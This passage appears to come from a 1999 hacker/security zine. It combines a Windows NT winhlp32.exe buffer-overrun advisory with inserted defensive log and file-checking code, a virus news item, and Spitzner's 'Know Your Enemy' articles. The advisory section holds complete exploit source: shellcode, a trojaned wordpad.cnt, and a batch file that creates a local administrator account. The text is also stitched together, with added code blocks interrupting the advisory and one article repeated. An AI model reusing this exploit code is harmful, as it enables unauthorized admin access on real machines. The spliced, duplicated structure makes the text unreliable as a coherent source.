Now we need the operation codes (opcodes) for all this, which we get by writing a program that uses the __asm function and then debugging it. This is what we actually load into our exploit code. Following is the source of a program that will create a "trojaned" wordpad.cnt. It will also create a batch file called add.bat - edit it as you see fit. I have compiled the program - you can get a copy of it from http://www.infowar.co.uk/mnemonix/winhlpadd.exe Note that this will run only on standard installs of NT with service pack 4 and expects an msvcrt.dll version of 4.20.6201 - run it from the winnt\help directory.
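Before the advisory's own program, a defender's view of the same bug, added here and not part of Litchfield's advisory: the overrun exists because winhlp32.exe copies a heading string from an untrusted .cnt file into a fixed-size stack buffer, so any tool that handles such files should inspect the heading in place and bound its length instead. The C checker below is example code; the 507-byte limit and the "level heading=topic" line layout are taken from the advisory, while the verdict names and the sample file contents are constructed. It flags heading lines that exceed the limit, that carry non-printable bytes where text belongs, or that lack the space after the level number.

```c
/* cntcheck.c: flag WinHelp .cnt heading strings that are oversized or contain
 * raw binary. Added example; not winhlp32.exe code and not Litchfield's.
 * The 507-byte limit and the "level heading=topic" line layout come from the
 * advisory; the verdict names and the sample below are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define CNT_HEADING_MAX 507   /* longest heading winhlp32 keeps before truncating */

enum cnt_verdict { CNT_OK = 0, CNT_MALFORMED = 1, CNT_TOO_LONG = 2, CNT_BINARY = 3 };

/* Inspect one line of exactly n bytes in place: nothing is copied into a
 * fixed buffer, which is the property the vulnerable parser lacked. */
static int verdict_n(const char *line, size_t n)
{
    size_t i = 0;
    if (n == 0 || !isdigit((unsigned char)line[0]))
        return CNT_OK;                      /* blank line or ":Title"-style directive */
    while (i < n && isdigit((unsigned char)line[i]))
        i++;                                /* level number */
    if (i >= n || line[i] != ' ')
        return CNT_MALFORMED;               /* "1Broken": no separator after the level */
    i++;
    const char *h = line + i;               /* heading text starts here */
    size_t hn = n - i;
    const char *eq = memchr(h, '=', hn);
    if (eq)
        hn = (size_t)(eq - h);              /* heading ends at "=topic" */
    for (size_t k = 0; k < hn; k++)
        if (!isprint((unsigned char)h[k]) && h[k] != '\t')
            return CNT_BINARY;              /* machine code, not a heading */
    if (hn > CNT_HEADING_MAX)
        return CNT_TOO_LONG;
    return CNT_OK;
}

/* Verdict for a single NUL-terminated line (trailing CR/LF ignored). */
int cnt_line_verdict(const char *line)
{
    return verdict_n(line, strcspn(line, "\r\n"));
}

/* Walk a whole file image and count the lines that are not CNT_OK. */
int cnt_count_suspicious(const char *text)
{
    int bad = 0;
    const char *line = text;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t n = nl ? (size_t)(nl - line) : strlen(line);
        size_t m = n;
        if (m && line[m - 1] == '\r')
            m--;
        if (verdict_n(line, m) != CNT_OK)
            bad++;
        line = nl ? nl + 1 : line + n;
    }
    return bad;
}

/* Constructed four-line sample: a directive, a benign heading, a heading of
 * 520 'A's (over the limit) and a heading carrying two raw 0x90 bytes. */
int cnt_demo_count(void)
{
    static char buf[1024];
    size_t off = 0;
    off += (size_t)snprintf(buf + off, sizeof buf - off,
                            ":Title WordPad Help\n1 Opening a document=WRIPAD_OPEN_DOC\n1 ");
    memset(buf + off, 'A', 520);
    off += 520;
    off += (size_t)snprintf(buf + off, sizeof buf - off,
                            "=LONG_TOPIC\n1 Find\x90\x90=BIN_TOPIC\n");
    return cnt_count_suspicious(buf);       /* 2: the oversized and the binary heading */
}

int main(void)
{
    printf("suspicious heading lines in sample: %d\n", cnt_demo_count());
    return 0;
}
```

A .cnt trojaned the way the advisory describes is caught by the non-printable check even though its heading fits under the 507-byte limit; the length check catches the cruder over-long variants, which winhlp32 would truncate but which still mark a tampered file. Localized help files that legitimately carry 8-bit text need the isprint() test replaced by a locale-aware one.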
Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix
http://www.arca.com

    #include <stdio.h>    /* printf, fopen, fprintf */
    #include <stdlib.h>   /* system */

    int main(void)
    {
        char eip[5]="\xE5\x27\xF3\x77";
        char ExploitCode[200]=
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x55\x8B\xEC\x33\xC0\x50\x50\x50"
            "\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52"
            "\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"
            "\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0"
            "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44"
            "\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8"
            "\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC";
        FILE *fd;

        printf("\n\n*******************************************************\n");
        printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
        printf("* This version runs on Service Pack 4 machines and    *\n");
        printf("* assumes a msvcrt.dll version of 4.00.6201           *\n");
        printf("*                                                     *\n");
        printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n");
        printf("*******************************************************\n\n");

        fd = fopen("wordpad.cnt", "r");
        if (fd==NULL)
        {
            printf("\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory");
            return 0;
        }
        fclose(fd);

        printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
        system("copy wordpad.cnt wordpad.sav");

        printf("\n\nCreating wordpad.cnt with exploit code...");
        fd = fopen("wordpad.cnt", "w+");
        if (fd==NULL)
        {
            printf("Failed to open wordpad.cnt in write mode. Check you have sufficient rights\n");
            return 0;
        }
        /* 356 bytes of padding, then the return address, then the code */
        fprintf(fd,"1 "
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "%s%s\n",eip,ExploitCode);
        fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n");
        fclose(fd);

        printf("\nCreating batch file add.bat\n\n");
        fd = fopen("add.bat", "w");
        if (fd == NULL)
        {
            printf("Couldn't create batch file. Manually create one instead");
            return 0;
        }
        printf("The batch file will attempt to create a user account called \"winhlp\" and\n");
        printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n");
        printf("Once this is done it will reset the files and delete itself.\n");
        fprintf(fd,"net user winhlp winhlp!! /add\n");
        fprintf(fd,"net localgroup administrators winhlp /add\n");
        fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
        fprintf(fd,"del wordpad.sav\n");
        fprintf(fd,"del add.bat\n");
        fclose(fd);
        printf("\nBatch file created.");
        printf("\n\nCreated. Now open up Wordpad and click on Help\n");
        return 0;
    }

@HWA

09.0 NAI ON GALADRIEL VIRUS
     ~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Saturday 22nd May 1999 on 12.18 pm CET

A couple of days ago we wrote about the Galadriel virus. This virus infects files with the CSC extension when an infected script is run from under CorelDraw and Corel Photo Paint 7, 8 and 9. A user is likely to notice the presence of the virus because many scripts stop executing properly when infected and a CorelDraw error message will occur. The CSC/CSV.A virus does not work under the WordPerfect suite as this suite uses a different language than the Corel script.
NAI categorized this virus as Low risk, and you could update your VirusScan with these patches: VirusScan 3 & VirusScan 4.0

@HWA

10.0 Know your enemy parts 1,2 and 3
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Part 1

The Attack of the Script Kiddie
Know Your Enemy
Lance Spitzner
Last Modified: May 23, 1999

My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie.

Who is the Script Kiddie

The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advanced users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness.

The Threat

It is this random selection of targets that makes the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block.
If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.

This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.

The Methodology

The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.

For example, let's say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap.
Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems.

You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring their systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this system as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable.

Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, let's say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure.

The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III.

These attacks are not limited to a certain time of the day.
Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.

The Tools

The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminately scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP database by conducting zone transfers of the domain name and all sub-domains. Users have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system. Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even further, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II.

How to Protect Against This Threat

There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information.
Another way to protect yourself is to run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris, Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats.

Conclusion

The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat.

NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article

Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.
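The last two defensive steps above, logging unauthorized zone transfers and watching for probes, only pay off if someone reads what the daemons log. The C program below is an added example, not part of Spitzner's article: it walks syslog-style lines and keeps, per source address, how many distinct services it was refused on and whether it tried a zone transfer, then flags sources that meet a threshold. The two message shapes it parses (a tcp_wrappers-style "refused connect from" line and a BIND-style "zone transfer ... denied" line) and all sample addresses and hostnames are constructed for the example; adapt the sscanf patterns to the exact text your own daemons emit.

```c
/* probewatch.c: summarise per-source probe indicators from syslog-style lines.
 * Added example, not from the article. The message shapes, hostnames and
 * addresses below are constructed; real daemons differ in wording. */
#include <stdio.h>
#include <string.h>

#define MAX_SRC   64   /* distinct source addresses tracked */
#define MAX_PORTS 16   /* distinct services remembered per source */

struct src {
    char ip[16];
    int  axfr_denied;                 /* refused zone-transfer attempts */
    int  nports;                      /* distinct services touched */
    char ports[MAX_PORTS][16];
};

struct report {
    struct src s[MAX_SRC];
    int n;
};

static struct src *find_or_add(struct report *r, const char *ip)
{
    for (int i = 0; i < r->n; i++)
        if (strcmp(r->s[i].ip, ip) == 0)
            return &r->s[i];
    if (r->n == MAX_SRC)
        return NULL;                  /* table full: caller drops the event */
    struct src *s = &r->s[r->n++];
    memset(s, 0, sizeof *s);
    strncpy(s->ip, ip, sizeof s->ip - 1);
    return s;
}

static void note_port(struct src *s, const char *svc)
{
    for (int i = 0; i < s->nports; i++)
        if (strcmp(s->ports[i], svc) == 0)
            return;                   /* service already counted for this source */
    if (s->nports < MAX_PORTS) {
        strncpy(s->ports[s->nports], svc, sizeof s->ports[0] - 1);
        s->nports++;
    }
}

/* Classify one line and record it: 1 = refused connect, 2 = AXFR denied, 0 = other. */
int probe_parse_line(struct report *r, const char *line)
{
    char ip[16], svc[16];
    struct src *s;
    /* constructed shape: "May 23 01:12:07 gw in.ftpd[201]: refused connect from 10.0.0.5" */
    if (strstr(line, "refused connect from") &&
        sscanf(line, "%*s %*s %*s %*s %15[^[][%*d]: refused connect from %15s", svc, ip) == 2) {
        if ((s = find_or_add(r, ip)) == NULL)
            return 0;
        note_port(s, svc);
        return 1;
    }
    /* constructed shape: "... named[88]: client 192.0.2.77#2345: zone transfer 'example.com/IN' denied" */
    const char *c = strstr(line, "client ");
    if (c && strstr(c, "zone transfer") && strstr(c, "denied") &&
        sscanf(c, "client %15[^#]", ip) == 1) {
        if ((s = find_or_add(r, ip)) == NULL)
            return 0;
        s->axfr_denied++;
        return 2;
    }
    return 0;
}

/* Count sources that attempted a zone transfer or touched >= min_ports services. */
int probe_flagged_sources(const char *logtext, int min_ports)
{
    static struct report r;           /* static: keeps the table off the stack */
    char buf[512];
    const char *line = logtext;
    r.n = 0;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t n = nl ? (size_t)(nl - line) : strlen(line);
        size_t m = n < sizeof buf - 1 ? n : sizeof buf - 1;   /* bounded copy of one line */
        memcpy(buf, line, m);
        buf[m] = '\0';
        probe_parse_line(&r, buf);
        line = nl ? nl + 1 : line + n;
    }
    int flagged = 0;
    for (int i = 0; i < r.n; i++)
        if (r.s[i].axfr_denied > 0 || r.s[i].nports >= min_ports)
            flagged++;
    return flagged;
}

/* Classify a single line without keeping state. */
int probe_line_kind(const char *line)
{
    static struct report scratch;
    scratch.n = 0;
    return probe_parse_line(&scratch, line);
}

/* Constructed sample: one sweep of four services, one refused AXFR, one stray refusal. */
const char PROBE_SAMPLE[] =
    "May 23 01:12:07 gw in.ftpd[201]: refused connect from 10.0.0.5\n"
    "May 23 01:12:08 gw in.telnetd[202]: refused connect from 10.0.0.5\n"
    "May 23 01:12:09 gw imapd[203]: refused connect from 10.0.0.5\n"
    "May 23 01:12:09 gw in.fingerd[204]: refused connect from 10.0.0.5\n"
    "May 23 02:00:11 gw named[88]: client 192.0.2.77#2345: zone transfer 'example.com/IN' denied\n"
    "May 23 02:30:00 gw in.ftpd[210]: refused connect from 10.0.0.9\n"
    "May 23 03:00:00 gw sshd[300]: Accepted password for bob from 10.0.0.9\n";

int main(void)
{
    printf("sources worth following up: %d\n", probe_flagged_sources(PROBE_SAMPLE, 3));
    return 0;
}
```

A sweep across several services from one address within minutes is the signature of the scanners the article describes; a single refused connection is noise, which is what the min_ports threshold separates. A denied zone transfer is flagged on its own, because every legitimate secondary should already be on the allow list, so whoever is left is building the kind of IP database the article warns about.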
This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. 
This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. 
Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you. The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. 
For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP database by conducting zone transfers of the domain name and all sub-domains. Users have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, the operating system, or the services running on the system. Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even further, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II.

How to Protect Against This Threat

There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill; they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information.

Another way to protect yourself is to run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris, Armoring Linux or Armoring NT.

As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them.
I highly recommend upgrading to the latest version of BIND (the software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes, gain a better understanding of the threats to your network, and react to these threats.

Conclusion

The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat.

NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article.

Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.

Part 2 Tracking their moves

Know Your Enemy: II
Lance Spitzner
Last Modified: May 23, 1999

In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically, how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot, determine with your system logs. You may be able to determine if you are being probed, what you were being probed for, what tools were used, and if they were successful. The examples provided here focus on Linux, but can apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step. However, this article is a good place to start.

Securing Your Logs

This article is not on Intrusion Detection; there are a variety of excellent sources that cover IDS. If you are interested in intrusion detection, I recommend checking out applications such as Network Flight Recorder or swatch.
This article focuses on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we first have to discuss securing your system logs. Your log files are worthless if you cannot trust their integrity. The first thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their presence from log files (such as cloak), or alter logging altogether (such as trojaned syslogd binaries). So, the first step to reviewing your logs is securing your logs. This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a compromised system. If nothing else, the blackhat can simply do a rm -rf /* on your system, wiping your hard drive clean. This makes recovering your logs somewhat difficult.

To protect against this, you will want all your systems to log traffic both locally and to a remote log server. I recommend making your log server a dedicated system, i.e., the only thing it should be doing is collecting logs from other systems. If money is an issue, you can easily build a linux box to act as your log server. This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server from receiving bad or unauthorized logging information from the Internet.

For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want.
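The pair of configuration files this setup needs, written out as an added example (not the article's own listing): the real file at the hidden path /var/tmp/.conf that the rebuilt syslogd reads, which logs both locally and to the remote log server, and the decoy /etc/syslog.conf that only logs locally. The log server name "loghost" is an assumption.

```conf
# /var/tmp/.conf -- the configuration the recompiled syslogd actually reads.
# Added example; "loghost" is an assumed name for the dedicated log server.
# Local files are kept so they can later be compared against the server copy.
# Some syslogd versions require a tab, not spaces, between selector and action.
*.info;mail.none;authpriv.none          /var/log/messages
authpriv.*                              /var/log/secure
mail.*                                  /var/log/maillog
# Every message is also sent to the remote log server (syslog, UDP 514).
*.*                                     @loghost

# /etc/syslog.conf -- the decoy left in the standard location. It lists only
# local destinations, so someone reading it sees no sign of remote logging.
*.info;mail.none;authpriv.none          /var/log/messages
authpriv.*                              /var/log/secure
mail.*                                  /var/log/maillog
```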
We then set up our new configuration file to log both locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, it will keep the blackhat from realizing the true destination of our remote logging.

Another option for your systems is to use a secure method of logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of options. One such option is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html.

Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source, it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one place. The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You can determine if the local logs have been altered by comparing them to the remote logs.

Pattern Matching

By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network for a single vulnerability. If your logs show most of your systems being connected to from the same remote system, on the same port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed by default. So, we would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by launching inetd with the "-t" flag, facility daemon. A typical exploit scan would look something like the one below.
Here we have a source scanning for the wu-ftpd vulnerability.

/var/log/secure
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200

Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is not always the case). This is the advantage of having a log server: you can more easily identify patterns in your network since all the logs are combined. The repeated connections to port 21, ftp, indicate they were most likely looking for the wu-ftpd exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release code for an imap exploit, and you will suddenly see a rush of imap scans in your logs. The next month you will be hit by ftp. An excellent source for current exploits is http://www.cert.org/advisories/

Sometimes, tools will scan for a variety of exploits at the same time, so you may see a single source connecting to several ports. Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers. For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the connections (see Intrusion Detection for more info on this).

What's the Tool?

Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely using one of these "single mission" tools.
However, there exist tools that probe for a variety of vulnerabilities or weaknesses; the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two "categories" of scanning tools. I highly recommend you run these tools against your own network; you may be surprised by the results :)

sscan represents the "all purpose" Script Kiddie scanning tool, and it's probably one of the best ones out there. It quickly probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user must be root to use it. The output is extremely easy to interpret (hence making it so popular): it gives a concise summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in the output, and then run the "exploit du jour". Below is an example of sscan run against the system mozart (172.17.6.30).

otto #./sscan -o 172.17.6.30
--------------------------<[ * report for host mozart *
<[ tcp port: 80 (http) ]>
<[ tcp port: 23 (telnet) ]>
<[ tcp port: 143 (imap) ]>
<[ tcp port: 110 (pop-3) ]>
<[ tcp port: 111 (sunrpc) ]>
<[ tcp port: 79 (finger) ]>
<[ tcp port: 53 (domain) ]>
<[ tcp port: 25 (smtp) ]>
<[ tcp port: 21 (ftp) ]>
--<[ *OS*: mozart: os detected: redhat linux 5.1
mozart: VULN: linux box vulnerable to named overflow.
-<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
-<[ *FINGER*: mozart: root: account exists.
